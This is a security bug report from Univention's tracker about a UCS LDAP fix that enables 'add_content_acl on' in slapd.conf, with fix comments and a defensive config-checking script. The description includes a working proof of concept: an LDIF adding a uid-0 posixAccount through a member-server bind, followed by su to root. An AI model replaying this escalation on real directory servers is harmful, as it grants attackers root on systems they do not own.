Bug 41797 - add add_content_acl on to slapd.conf
Status: CLOSED FIXED
Product: UCS
Classification: Unclassified
Component: LDAP
UCS 4.1
Other Linux
: P5 critical
: UCS 4.2
Assigned To: Florian Best
Arvid Requate
: interim-1
Depends on: 49523 49524 41715 41725 44055 49434 49507
Blocks: 41723 41724
Reported: 2016-07-15 09:51 CEST by Florian Best
Modified: 2021-06-23 07:29 CEST (History)

See Also:
What kind of report is it?: Security Issue
What type of bug is this?: ---
Who will be affected by this bug?: ---
How will those affected feel about the bug?: ---
User Pain:
Enterprise Customer affected?:
School Customer affected?:
ISV affected?:
Waiting Support:
Flags outvoted (downgraded) after PO Review:
Ticket number:
Bug group (optional): Security
Max CVSS v3 score:


Attachments

Description Florian Best univentionstaff 2016-07-15 09:51:55 CEST
The content of LDAP ACLs is only evaluated if the database entry in slapd.conf contains "add_content_acl on". Memberservers/DCs can create arbitrary objects in various positions otherwise.
As there are dependencies between UCS and UCS@school, we release this part of Bug #41715 a little bit later.

+++ This bug was initially created as a clone of Bug #41715 +++

Preconditions: Having a memberserver/slave/master/backup or any object underneath cn=memberserver,cn=computers,$ldap_base / cn=dc,cn=computers,$ldap_base.

root@xen3:~# eval "$(ucr shell)"
root@xen3:~# udm container/cn create --set name=memberserver --position "cn=computers,$ldap_base"
Object created: cn=memberserver,cn=computers,dc=school,dc=local
root@xen3:~# eval "$(ucr shell)"; udm computers/memberserver create --set name=hacker --position="cn=memberserver,cn=computers,$ldap_base" --set password=univention
Object created: cn=hacker,cn=memberserver,cn=computers,dc=school,dc=local

# now PWN it
$ cat posix_account.ldif
dn: univentionAppID=foobar,cn=samba4,cn=apps,cn=univention,dc=school,dc=local
univentionAppID: foobar
objectClass: univentionApp
objectClass: posixAccount
uid: hacker
cn: hacker
uidNumber: 0
gidNumber: 0
homeDirectory: /root
loginShell: /bin/bash
userPassword:: e2NyeXB0fSQ2JEguMDVWRC9EdVBueUlvTkMkeUlKd1lCWk5XVTRma0NWOFNFMHFpUDd5REIzSVFXbkZQUjA4VWkuTUtjSFFCWnZ5N09JbVUyYXZiMjJHVFlHbHpCZzRGanR0TVlDVXo4RldTcDBKbC8=
$ ldapadd -D cn=hacker,cn=memberserver,cn=computers,dc=school,dc=local -w univention < posix_account.ldif
adding new entry "univentionAppID=foobar,cn=samba4,cn=apps,cn=univention,dc=school,dc=local"
$ su hacker
Passwort: 
hacker@xen3:~# id
uid=0(hacker) gid=0(root) Gruppen=0(root)
Comment 1 Florian Best univentionstaff 2017-01-13 19:00:43 CET
r75785 | Changelog Bug #41797

univention-ldap (13.0.2-1):
r75784 | Bug #41797: add add_content_acl on configuration
Comment 2 Arvid Requate univentionstaff 2017-02-01 21:12:55 CET
Ok, I made the wording of the changelog entry a bit more verbose.

Relevant documentation from slapd.conf(5):
===============================================================================
add_content_acl:

Controls whether Add operations will perform ACL checks on the content of the entry being added. [...]
===============================================================================

And slapd.access(5) says:
===============================================================================
Also if Add content ACL checking has been configured on the database [...], add (=a) will be required on all of the attributes being added.
===============================================================================
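The two man page excerpts above describe the setting the fix relies on: without "add_content_acl on" in a database stanza, slapd only checks that the bind DN may create a child at the target DN, not that it has add (=a) rights on every attribute of the new entry. The script below is an added example (not part of this bug report or of the univention-ldap package) that parses a slapd.conf file in the stanza layout slapd.conf(5) documents and reports every database that lacks the directive, so an administrator can verify the hardening on a host before and after the update. The embedded slapd.conf text is constructed for the example; the function and file names are the example's own.

```python
"""Report slapd.conf database stanzas that lack 'add_content_acl on'.

Added example, not code from the bug report or from univention-ldap. Parsing
follows slapd.conf(5): a 'database <type>' line opens a stanza that runs until
the next 'database' line or end of file; directive names are case-insensitive;
lines beginning with whitespace continue the previous directive; '#' starts a
comment line.
"""

# Constructed sample: the first database carries the hardening directive,
# the second one does not and would accept adds without per-attribute checks.
SAMPLE_SLAPD_CONF = """\
include /etc/ldap/schema/core.schema
loglevel stats

database mdb
suffix "dc=school,dc=local"
rootdn "cn=admin,dc=school,dc=local"
add_content_acl on
access to attrs=userPassword
    by self write
    by * auth

# second backend without add_content_acl
database mdb
suffix "dc=other,dc=example"
rootdn "cn=admin,dc=other,dc=example"
"""


def _logical_lines(text):
    """Drop blank and comment lines and join continuation lines (leading
    whitespace) onto the preceding directive, as slapd does when reading
    the file."""
    lines = []
    for raw in text.splitlines():
        if not raw.strip() or raw.lstrip().startswith("#"):
            continue
        if raw[0] in " \t" and lines:
            lines[-1] += " " + raw.strip()
        else:
            lines.append(raw.rstrip())
    return lines


def parse_databases(text):
    """Return one dict per 'database' stanza with keys 'type', 'suffix' and
    'add_content_acl' (True, False, or None when the directive is absent)."""
    databases = []
    current = None
    for line in _logical_lines(text):
        parts = line.split(None, 1)
        directive = parts[0].lower()
        arg = parts[1].strip() if len(parts) > 1 else ""
        if directive == "database":
            current = {"type": arg, "suffix": None, "add_content_acl": None}
            databases.append(current)
        elif current is None:
            continue  # still in the global section before any database
        elif directive == "suffix":
            current["suffix"] = arg.strip('"')
        elif directive == "add_content_acl":
            current["add_content_acl"] = arg.lower() == "on"
    return databases


def databases_without_content_acl(text):
    """Suffixes (or backend type, if no suffix) of databases where an Add
    operation is not checked against the attributes being added."""
    return [
        db["suffix"] or db["type"]
        for db in parse_databases(text)
        if db["add_content_acl"] is not True
    ]


if __name__ == "__main__":
    # Usage: python check_add_content_acl.py [/etc/ldap/slapd.conf]
    import sys

    conf = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_SLAPD_CONF
    for suffix in databases_without_content_acl(conf):
        print("add_content_acl is not 'on' for database:", suffix)
```

Run against the sample it prints the second suffix only; pointed at a real file it lists each database whose adds still skip the per-attribute ACL check, which is the condition the description of this bug exploits.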
Comment 3 Stefan Gohmann univentionstaff 2017-04-04 18:29:21 CEST
UCS 4.2 has been released:
 https://docs.software-univention.de/release-notes-4.2-0-en.html
 https://docs.software-univention.de/release-notes-4.2-0-de.html

If this error occurs again, please use "Clone This Bug".